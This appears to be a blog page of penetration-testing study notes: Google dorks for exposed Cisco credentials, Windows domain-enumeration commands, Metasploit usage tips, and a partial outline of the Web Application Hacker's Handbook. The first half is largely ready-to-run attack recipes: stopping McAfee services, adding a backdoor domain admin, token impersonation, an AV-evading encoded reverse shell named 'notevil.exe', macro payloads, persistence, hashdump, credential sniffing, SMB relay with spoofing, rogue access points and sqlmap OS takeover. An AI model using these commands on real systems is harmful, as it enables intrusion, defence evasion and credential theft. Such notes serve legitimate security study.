Pen Testing Notes

Views

Cisco Hacking Exposed

Google
!Host=*.* intext:enc_UserPassword=* ext:pcf
enable password | secret “current configuration” -intext:the
inurl:”level/15/exec/-/show”
“intitle:Cisco Systems, Inc. VPN 3000 Concentrator”
intitle:Cisco “You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator”
intitle:”Cisco CallManager User Options Log On” intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password"
inurl:webvpn.html “login” “Please enter your”
"ip host tftp"
intext:"Written by enable_15"

Windows Command Line Kung Fu
Enumerate the network
c:\set Use SET to get domain information and username
c:\net view Use NET VIEW to get computers in the users domain and other domains
c:\net view /domain Use NET VIEW to get computers in other domains
c:\net user Use NET USER to get local users on the computer you are on
c:\net user /domain All users in the current user's domain
c:\net localgroup Use NET LOCALGROUP to get the local groups on the computer
c:\net localgroup /domain Use NET LOCALGROUP to get the domain groups
c:\net localgroup administrators All users in the local administrators group
c:\net localgroup administrators /domain All users in the domain administrators group
c:\net group "Company Admins" /domain All users in the "Company Admins" group
c:\net user "wesley.pipes" /domain All info about this user
c:\nltest /dclist: List Domain Controllers...

Find a user
NBTSTAT -a remotecomputer | FIND "<03>" | FIND /I /V "remotecomputer"
WMIC /Node:remotecomputer ComputerSystem Get UserName
PSLOGGEDON -L \\remotecomputer
PSEXEC \\remotecomputer NET CONFIG WORKSTATION | FIND /I " name "
PSEXEC \\remotecomputer NET NAME
PSEXEC \\remotecomputer NETSH DIAG SHOW COMPUTER /V | FIND /i "username"

Kill McAfee
Get SYSTEM level cmd prompt
time
at /interactive cmd.exe
net stop "McAfee Framework Service"
net stop hips
net stop enterceptagent
net stop firepm
pskill -t UdaterUI
pskill -t TBMon
pskill -t Mcshield
pskill -t VsTskMgr
pskill -t shstat
pskill -t firetray

Add domain user
c:\net user j0e j0eR0ck$ /domain /add
c:\net localgroup administrators j0e /domain /add

Metasploit Kung Fu - Notes

XMLRPC Interface - allows metasploit to be accessed via XML over RPC, listens on TCP 55553 by default
msf> load xmlrpc

Payloads - Singles (windows/shell_bind_tcp) vs. Stages (windows/shell/bind_tcp)
Singles don't require back and forth communication, whereas stages allow for more flexibility in payloads

All stages attempt to dodge NX and DEP by default, except nonx
All stages use reflective DLL injection(copied into memory) currently, whereas the older patchupmeterpreter method left metsrv.dll visible to the system

msf> show options - gives you some great logging options as well as other useful features (ConsoleLogging, LogLevel, MinimumRank, SessionLogging,

TimestampOutput)

Exploits - some modules include check to verify vulnerability first and evasion to dodge IDS

set RHOSTS file:/tmp/targets.txt - when you don't have contiguous ip addresses or a single domain

Metasploit has IPv6 support in all exploits and auxiliary modules and some payloads

Save command will keep your session settings in ~/.msf3/config

Exploit -z will put any new sessions in the background, good for multiple targets
Exploit -j will background the exploit itself and give you the msf> prompt back right away
The commands can be used together

Pivot using msf> route add

Netcat using msf> connect

Resource files allow you to script metasploit commands msf> resource attack.rc

msf> irb gives you an interactive ruby shell usefull for writing exploits in real time that use ruby libraries

Pivot FTW meterpreter> portfwd add -l 1111 -p 2222 -r

To elevate to admin or system priveleges meterpreter> use priv

Incognito meterpreter> use incognito, list_tokens -u, impersonate_token DOMAIN\\user
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "domain\\user"
meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token or meterpreter > list_tokens -g
meterpreter > impersonate_token "DOMAIN\\Domain Admins"
meterpreter> execute -c -H -f cmd -a "/k" -i -t <--- Use the -t to use your impersonated token Meterpreter scripts: meterpreter> run getcountermeasure.rb, winenum.rb, checkvm.rb, prefetchtool.rb, scheduleme.rb, persistence.rb, hashdump.rb, getgui.rb,

winbf.rb, search_dwld.rb

msf> set AutoRunScript , allows you to quickly migrate to another process after exploitation

Run hidden processes meterpreter> execute -H -f calc.exe

Harvest emails msf> use auxiliary/gather/search_email_collector

DNS recon msf> use auxiliary/gather/dns_enum; ENUM_RVL option will do reverse lookup on a netrange

TCP Portscan msf> use auxiliary/scanner/portscan/
UDP Portscan msf> use auxiliary/scanner/discovery/sweep_udp - only common ports

Database Integration with MySQL and PostgeSQL - hosts, services, vulns, clients, and notes tables
Supports importing(db_import_) of nmap, amap, nessus, qualys, and nexpose data
Manually edit the datbase using db_add_ and db_del_

db_autopwn - generally unreliable and bad for production pentesting. Use -t option to list exploits for a found vulnerability. Planned -s option will only

return one shell and stop. Planned to run exploits by rating.

Other scanners include ftp, snmp, telnet, smb, robots.txt, oracle, mssql, mysql

New report generator is planned for Metasploit

XMLRPC allows Metasploit to be controlled by third party products like Nsploit(nmap) and BEeF. Both are still somewhat buggy.
msf> load xmlrpc Pass=; default user name is msf; optional ServerType=Web

Nsploit #nmap -A --script=ms03_026_dcom will auto execute the exploit if the port is open and there is an OS match

Public web document metadata is a good passive technique for finding out what software a company may be using

Browser_autopwn uses rex/exploitation/javascripttodetect module to find browser and OS version. Use MATCH option to narrow down the types of

exploits used. Likely to crash client browser, so quick migration is key. Very buggy behind NAT/Proxy. SSL option uses a default cert, however you can

provide a signed trusted one.

If attacking a large number of systems, its good to use separate LHOST c2 server running exploit/multi/handler

If a target is in another country or running a different language pack, its common for exploitation to fail because the return address may be different.

Msfpescan can check a binary for a new address by comparing it to the old one.
To find the existing offset # ./msfpescan -r
To find the new return address # ./msfpescan -b

msfpayload can output a variety of formats besides EXE including VBA, C, WAR, Ruby, Perl, JS. C code is useful for putting into a repository. VBA is

useful for embedding in Office docs as a macro. Outputting the payload into Ruby makes them usable by metasploit.

# ./msfpayload windows/shell/reverse_tcp LHOST= , LPORT=4444 R | ./msfencode -c 5 -e x86/shikata_ga_nai -t exe > notevil.exe

x86/shikata_ga_nai is the default and best encoder availabe in msfencode. It uses polymorphic shellcode in both the payload and the stub used to

decode your data. This is usuallly very good for dodging AV, however some vendors have added detection for the EXE template used by Metasploit.

The -x option allows you to specify any exe to be used as the PE template.

To test your encoded binaries and not have the submitted to AV use - http://scanner2.novirusthanks.org/

exe2vba.rb will convert your existing exe into vba format for use in Office Macros
py2exe will convert your python exploit into an exe

Inject payload into a PDF mdf>use windows/fileformat/adobe_pdf_embedded_exe; Requires user interaction

Social Engineering Toolkit(SET) will automate creation of website & email phishing attacks

"Shell is only the beginning" -Dark0perator

HACKING file in framework directory will provide guildines for writting your own exploits. Put in ~/.msf3/modules

Persistence meterpreter>run persistence -r -A -X; Creates a VBS in TEMP and a Run key in registry

"Chunky Bacon" meterpreter> irb will inherit all your ruby methods: client.fs.dir.methods, client.fs.file.methods, client.sys.process.methods, etc
>> client.sys.process.execute("ipconfig", nil, {'Hidden' => true, 'Channelized' => true}); nil is the path to the command

auxiliary/psnuffle will act as a sniffer and also extract credentials for URLs, IMAP, ftp, and pop3

Spoofing attack with SMB Realy
# dnsspoof -f ./OurDNSFile.txt ; # arpspoof -i -t
msf> use exploit/windows/smb/smb_relay

Enumerating Oracle SID - oracle/xdb_sid, emc_sid, spy_sid, sid_enum
P0wning Oracle - oracle/login_brute, ora_ntlm_stealer, admin/oracle/sql
MSSQL - mssql/mssql/mssql_exec, mssql_login, mssql_sql
MySQL - admin/mysql/mysql_enum, mysql_sql, scanner/mysql/mysql_login, mysql_version

Karmetasploit is fakeap piped into Metasploit. Easier to configure with kmsapng.sh from Dark0perator. Best to modify the script to not run every exploit

though. # ./kmsapng.sh -m km -i wlan0; km=airbase-ng drivers kma=atherosmad-wifi drivers. -f options adds filtering

Chaka Kahn by J Wright beacons the top SSIDSs from wigle.net. Newer wireless clients will not probe for an AP unless they see a beacon first. Add

corporate SSIDs to your ssid list and hangout at the closest coffee shop.

Metasploit has DECT functions - dect/call_scanner, dect/station_scanner, requires a DECT card. Buy from German ebay.

Web Assessment
scanner/http/http_version - finds web server versions
scanner/http/robots_txt - pulls info from robots.txt
scanner/http/writable - finds any writable directories
auxiliary/http_index_grabber - performs HTTP Gets on /

Wmap integrates many of these commands msf>load db_wmap
wmap_attack - crawl and attack
wmap_crawl - crawl only, supports authentication and proxy
wmap_targets - manage targets
wmap_sql - only sql statements against internal wmap db
wmap_website - allows you to see structure of target website
wmap_proxy - alternative to ratproxy or burp

http://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner
http://www.metasploit.com/redmine/projects/framework/wiki/WMAP

SQLMap will leverage an SQL injection to provide a metasploit payload
# ./sqlmap.pay --msf-path=/home/tools/msf3/ --url="http:///inscecure.php" --method=POST --data="name=bob&submit=Search" -p name --os-pwn
Must provide document root, Supports encoding of payload

Lab Notes - Get a Technet subsciptions $350, Win2K most stable victim box, copy of McAfee and Symantec

Resources

GPWN mailing list
CmdLine Kung Fu - http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html
Pentesting Perfect Storm Series
http://www.willhackforsushi.com/?page_id=137
http://www.coresecurity.com/content/penetration-testing-webcasts
Linn's XMLRPC - https://www.defcon.org/images/defcon-18/dc-18-presentations/Linn/DEFCON-18-Linn-Multiplayer-Metasploit.pdf
Why's Ruby Guide - http://mislav.uniqpath.com/poignant-guide/
HD on IPv6 Hacking - http://www.uninformed.org/?v=10&a=3
Fast Cracking - http://hashcat.net/oclhashcat/



Web Application Hacker's Handbook - Notes

1 - Web Application (In)security

Massive false sense of security in SSL. Most websites are insecure in ways that have nothing to do with encryption in transit.

Core Problem: Uses Can Submit Arbitrary Input -> Users can tamper with any data sent to the server, can input in any sequence, and are not restricted to using a browser.

Companies using public web applications have reduced their perimeter control by exposing back end internal systems to web applications that are located in a publicly accessible DMZ.

2 - Core Defense Mechanisms

User Access - Authentication, Session Management, & Access Control

Input Handling - Reject Known Bad, Accept Known Good, Sanitization, Safe Data Handling, & Semantic Checks

Boundary Validation - treat data as untrusted at multiple stages of the processing across systems

Multistage Validation and Canonicalization where user input is manipulate over several stages
examples - <scr<script>ipt> or <scr"ipt> and %%2727

Handling Attackers - Handling Errors, Maintaining Audit Logs, Alerting Admins, Reacting to attacks

Error Handling - never return any system messages or debug information. Applications should use try/catch blocks and checked exceptions.

Logs not only need to be protected from erasure by the attacker but also from read access as they often contain sensitive information

3 - Web Application Technologies

TRACE http method can be used to test for proxy servers. It should return the exact contents of the request it received.

When https is routed through a proxy it becomes a pure TCP-level relay to the dest web server using the CONNECT method.

Enterprise Java Bean(EJB) is a complex software component that encapsulates a specific business function for the application.

Plain Old Java Object(POJO) is user-defined and simpler then an EJB.

Java Servlet(JSP) reside on the application server to handle http requests and responses.

Java Web Container is a platform or engine that provides a run time environment for java web apps. (Tomcat, WebLogic, JBoss)

Common 3rd party components: JAAS, ACEGI for auth, SiteMesh, Tapestry for presentation, Hibernate for DB object mapping, and Log4J for logging

Always URL encode [space, %, ?, &, =, ;, +, #] when used as data. Not needed when used as parameters.

4 - Mapping the Application

Enumerate Content & Functionality: Site Map, robots.txt, Spidering

User Controlled Spidering is preferred over automated in order to handle auth session problems, dynamic content, and admin functions.

Content can often include backup files and archives, old and dev code, configuration and source files, and log files.

Before bruteforcing for common directories and files, make manual requests to see how the server handles valid and invalid requests.

Identify the naming scheme if applicable ( AnnualReport2009.pdf -> AnnualReport2010.pdf)

Key areas to investigate:
Core Functions of the App
Peripheral behavior like links, errors, logging, redirects, etc
Security mechanisms like session state, access controls, authorization controls, user registration, password changes and account recovery
All user supplied input locations
Any file upload/download functions
Client-side technology like forms, javascript, java applets, ActiveX, Flash, and cookies
Server-side technology like web server instance, request parameters, use of SSL, db interactions, and other back-end components

Httprint can fingerprint a server even with a disguised banner

Request a non-existent .aspx file to immediately find out if ASP is being used

Common directories:
servlet - Java
pls - Oracle
cfdocs/cfide - ColdFusion
WebObjects/.woa - Apple WebObjects
rails - Ruby on Rails

Common session tokens:
JSESSIONID - Java
ASPSESSIONID - IIS
ASP.NET_SessionId - ASP.NET
CFID/CFTOKEN - ColdFusion
PHPSESSID - PHP

5 - Bypassing Client-Side Controls

6 - Attacking Authentication

7 - Attacking Session Management

8 - Attacking Access Controls

9 - Injecting Code

10 - Exploiting Path Traversal

11 - Attacking Application Logic

12 - Attacking Other Users

13 - Automating Bespoke Attacks

14 - Exploiting Information Disclosure

15 - Attacking Compiled Applications

16 - Attacking Application Architecture

17 - Attacking the Web Server

18 - Finding Vulnerabilities in Source Code

19 - Web Application Hacker's Toolkit

20 - Web Application Hacker's Methodology 

Reference:
https://cyberguardians.blogspot.com/p/pen-testing.html